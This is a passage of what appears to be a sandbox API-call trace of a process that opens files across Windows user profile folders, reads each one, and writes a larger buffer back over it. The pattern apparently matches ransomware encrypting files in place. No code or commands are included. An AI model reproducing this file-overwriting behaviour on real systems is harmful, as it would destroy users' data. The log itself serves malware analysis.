playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.579] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.580] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x504 [0180.580] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.580] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.580] ReleaseMutex (hMutex=0x168) returned 1 [0180.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="04_Music_played_in_the_last_month.wpl", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0180.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="04_Music_played_in_the_last_month.wpl", cchWideChar=37, lpMultiByteStr=0x1fa54dc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="04_Music_played_in_the_last_month.wpl", lpUsedDefaultChar=0x0) returned 37 [0180.580] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f3be08, nNumberOfBytesToRead=0x504, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3be08*, lpNumberOfBytesRead=0x331f2bc*=0x504, lpOverlapped=0x0) returned 1 [0182.087] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0182.087] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xa8c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x331f2d0*=0xa8c, lpOverlapped=0x0) returned 1 [0182.087] CloseHandle (hObject=0x1f0) returned 1 [0182.088] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0182.089] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0182.089] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x437 [0182.089] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0182.089] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.089] ReleaseMutex (hMutex=0x168) returned 1 [0182.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="12_All_Video.wpl", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0182.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="12_All_Video.wpl", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="12_All_Video.wpl", lpUsedDefaultChar=0x0) returned 16 [0182.089] ReadFile (in: hFile=0x1f0, lpBuffer=0x269cf68, nNumberOfBytesToRead=0x437, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cf68*, lpNumberOfBytesRead=0x331f2bc*=0x437, lpOverlapped=0x0) returned 1 [0182.106] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0182.132] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9bf, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x331f2d0*=0x9bf, lpOverlapped=0x0) returned 1 [0182.133] CloseHandle (hObject=0x1f0) returned 1 [0182.133] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0182.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0182.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x200000 [0182.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0182.134] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.134] ReleaseMutex (hMutex=0x168) returned 1 [0182.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edbres00002.jrs", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0182.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edbres00002.jrs", cchWideChar=15, lpMultiByteStr=0x1f7366c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edbres00002.jrs", lpUsedDefaultChar=0x0) returned 15 [0182.134] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0183.114] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0183.121] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1ff000 [0183.121] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0183.132] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1ff000 [0183.132] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0183.135] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0183.135] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0183.136] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0183.136] CloseHandle (hObject=0x1f0) returned 1 [0183.136] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0183.137] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.137] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xe9 [0183.137] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.137] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.138] ReleaseMutex (hMutex=0x168) returned 1 [0183.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0183.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.htm", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Roses.htm", lpUsedDefaultChar=0x0) returned 9 [0183.138] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x331f2bc*=0xe9, lpOverlapped=0x0) returned 1 [0183.139] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0183.139] WriteFile (in: hFile=0x1f0, lpBuffer=0x28fca08*, nNumberOfBytesToWrite=0x671, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28fca08*, lpNumberOfBytesWritten=0x331f2d0*=0x671, lpOverlapped=0x0) returned 1 [0183.139] CloseHandle (hObject=0x1f0) returned 1 [0183.139] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0183.140] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.140] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x104 [0183.140] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.140] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.140] ReleaseMutex (hMutex=0x168) returned 1 [0183.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0183.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpUsedDefaultChar=0x0) returned 32 [0183.140] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eea318, nNumberOfBytesToRead=0x104, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea318*, lpNumberOfBytesRead=0x331f2bc*=0x104, lpOverlapped=0x0) returned 1 [0183.141] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0183.141] WriteFile (in: hFile=0x1f0, lpBuffer=0x28fca08*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28fca08*, lpNumberOfBytesWritten=0x331f2d0*=0x68c, lpOverlapped=0x0) returned 1 [0183.141] CloseHandle (hObject=0x1f0) returned 1 [0183.142] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0183.144] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.144] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x192 [0183.144] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.144] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.144] ReleaseMutex (hMutex=0x168) returned 1 [0183.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0183.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0183.144] ReadFile (in: hFile=0x1f0, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x331f2bc*=0x192, lpOverlapped=0x0) returned 1 [0183.145] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0183.145] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x71a, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x331f2d0*=0x71a, lpOverlapped=0x0) returned 1 [0183.145] CloseHandle (hObject=0x1f0) returned 1 [0183.145] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0183.146] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.146] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x85 [0183.146] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.146] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.146] ReleaseMutex (hMutex=0x168) returned 1 [0183.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Work.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0183.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Work.url", cchWideChar=21, lpMultiByteStr=0x1f88b2c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft At Work.url", lpUsedDefaultChar=0x0) returned 21 [0183.146] ReadFile (in: hFile=0x1f0, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x331f2bc*=0x85, lpOverlapped=0x0) returned 1 [0183.147] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0183.148] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x331f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0183.148] CloseHandle (hObject=0x1f0) returned 1 [0183.148] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0183.148] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.148] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x85 [0183.149] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.149] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.149] ReleaseMutex (hMutex=0x168) returned 1 [0183.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Get Windows Live.url", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0183.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Get Windows Live.url", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get Windows Live.url", lpUsedDefaultChar=0x0) returned 20 [0183.149] ReadFile (in: hFile=0x1f0, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x331f2bc*=0x85, lpOverlapped=0x0) returned 1 [0183.150] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0183.150] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x331f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0183.150] CloseHandle (hObject=0x1f0) returned 1 [0183.150] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0183.152] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.152] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1f8 [0183.152] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.152] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.152] ReleaseMutex (hMutex=0x168) returned 1 [0183.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0183.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0183.152] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x331f2bc*=0x1f8, lpOverlapped=0x0) returned 1 [0183.153] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0183.153] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x331f2d0*=0x780, lpOverlapped=0x0) returned 1 [0183.153] CloseHandle (hObject=0x1f0) returned 1 [0183.154] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0183.154] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.154] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xae [0183.154] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.154] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.154] ReleaseMutex (hMutex=0x168) returned 1 [0183.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0183.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0183.154] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f39f18, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39f18*, lpNumberOfBytesRead=0x331f2bc*=0xae, lpOverlapped=0x0) returned 1 [0183.154] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0183.155] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x636, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x331f2d0*=0x636, lpOverlapped=0x0) returned 1 [0183.155] CloseHandle (hObject=0x1f0) returned 1 [0183.155] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0183.155] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.156] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x17c [0183.156] SetFilePointer (in: hFile=0x1f0, 